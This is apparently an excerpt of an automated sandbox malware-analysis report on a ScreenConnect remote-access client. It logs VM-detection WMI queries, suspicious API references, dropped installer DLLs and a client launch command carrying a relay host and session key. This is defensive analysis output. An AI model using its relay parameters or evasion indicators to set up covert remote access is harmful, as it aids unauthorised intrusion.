                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - Root\CIMV2 : select * from Win32_BIOS
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\ScreenConnect.Core.dllJump to dropped file
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exe TID: 2100Thread sleep count: 149 > 30
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exe TID: 3580Thread sleep count: 176 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5352Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - Root\CIMV2 : select * from Win32_ComputerSystem
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - Root\CIMV2 : select * from Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: ScreenConnect.ClientService.exe, 00000005.00000002.472634735.00000000049A0000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.465003729.000001FDEB940000.00000002.00000001.sdmp, svchost.exe, 00000017.00000002.410176266.0000018B27540000.00000002.00000001.sdmp, svchost.exe, 0000001F.00000002.465739194.000001F55FB40000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: svchost.exe, 0000000A.00000002.469338666.000001F8C5C61000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                      Source: svchost.exe, 0000000A.00000002.469272488.000001F8C5C4C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000000B.00000002.459795439.0000025ED2A02000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: ScreenConnect.ClientService.exe, 00000005.00000002.472634735.00000000049A0000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.465003729.000001FDEB940000.00000002.00000001.sdmp, svchost.exe, 00000017.00000002.410176266.0000018B27540000.00000002.00000001.sdmp, svchost.exe, 0000001F.00000002.465739194.000001F55FB40000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: ScreenConnect.ClientService.exe, 00000005.00000002.472634735.00000000049A0000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.465003729.000001FDEB940000.00000002.00000001.sdmp, svchost.exe, 00000017.00000002.410176266.0000018B27540000.00000002.00000001.sdmp, svchost.exe, 0000001F.00000002.465739194.000001F55FB40000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: svchost.exe, 0000000A.00000002.458903041.000001F8C0429000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`C
                      Source: svchost.exe, 0000000B.00000002.460085267.0000025ED2A29000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.459066739.000002400FC29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: ScreenConnect.ClientService.exe, 00000005.00000002.472634735.00000000049A0000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.465003729.000001FDEB940000.00000002.00000001.sdmp, svchost.exe, 00000017.00000002.410176266.0000018B27540000.00000002.00000001.sdmp, svchost.exe, 0000001F.00000002.465739194.000001F55FB40000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information queried: ProcessInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E36084 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E36084 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E31160 LoadLibraryW,GetProcAddress,CorBindToRuntimeEx,SysAllocString,SysFreeString,GetModuleHandleW,GetModuleFileNameW,PathRemoveExtensionW,PathFindFileNameW,StrCpyW,StrCpyW,StrCpyW,SafeArrayCreateVector,VariantClear,VariantClear,SysAllocString,SafeArrayPutElement,VariantClear,VariantInit,VariantInit,VariantInit,SysAllocString,SysFreeString,VariantClear,SysAllocString,SysFreeString,VariantClear,VariantClear,
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E3226C GetProcessHeap,
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess token adjusted: Debug
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess token adjusted: Debug
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E33DC8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E33D97 SetUnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      .NET source code references suspicious native API functionsShow sources
                      Source: Microsoft.Deployment.WindowsInstaller.dll.2.dr, Deployment.WindowsInstaller/NativeMethods.csReference to suspicious API methods: ('FindResourceEx', 'FindResourceEx@kernel32.dll'), ('LoadLibraryEx', 'LoadLibraryExW@kernel32.dll')
                      Source: 5.2.ScreenConnect.ClientService.exe.3ae0000.6.unpack, ScreenConnect/WindowsNative.csReference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32'), ('VirtualProtect', 'VirtualProtect@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32'), ('OpenProcess', 'OpenProcess@kernel32'), ('VirtualAlloc', 'VirtualAlloc@kernel32'), ('MapVirtualKey', 'MapVirtualKey@user32')
                      Source: 6.2.ScreenConnect.WindowsClient.exe.1bdf0000.4.unpack, ScreenConnect/WindowsNative.csReference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32'), ('VirtualProtect', 'VirtualProtect@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32'), ('OpenProcess', 'OpenProcess@kernel32'), ('VirtualAlloc', 'VirtualAlloc@kernel32'), ('MapVirtualKey', 'MapVirtualKey@user32')
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exe 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exe' '?e=Access&y=Guest&h=instance-s6p2r4-relay.screenconnect.com&p=443&s=b49f7b4e-1f8e-4869-a774-7ac73425b6f9&k=BgIAAACkAABSU0ExAAgAAAEAAQAlGYhEPkxKLjcbpwfNZ%2bHR%2fKlTyh8C1eZxhmDq%2baJwQu0VExdNkYfU8P8vD7Y1ZlciHJizNXwnloBDvG1WWJc%2fIrWfX92vykYxqBgUI%2b4K3nOFaRgz3P4iujIXLKmSFuso0Nz%2f9QKAIGQ2FXaFykfYO2dzQQT3wK3Tf0snCYB0oDbSx4YwykdQiz5RcNZfnRkEpx9V%2fjHA1Ojf4Qy2Jy%2beBkU7baqCnkSPedSlHYXKd5Ntlcetv0j6hyn1m4yl%2fFPTTzSAOHcH9OFurBD8INMgbxBWfXp2iwBLbUhbM%2fwW8uAnf93bOrruAeNwCTfZiqQKKfPT0Gmm24qAeUeFxKjR&t=&c=gazete&c=gov.tr&c=tr&c=pc&c=&c=&c=&c='
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.463253279.0000000001A40000.00000002.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.463530395.0000000001240000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.462207248.000002738C990000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: ScreenConnect.WindowsClient.exe, svchost.exe, 0000000D.00000002.462207248.000002738C990000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: ScreenConnect.WindowsClient.exe, svchost.exe, 0000000D.00000002.462207248.000002738C990000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.457186960.0000000000CF2000.00000002.00020000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000000.212668661.00000000005B2000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.463253279.0000000001A40000.00000002.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.463530395.0000000001240000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.462207248.000002738C990000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E33FB0 cpuid
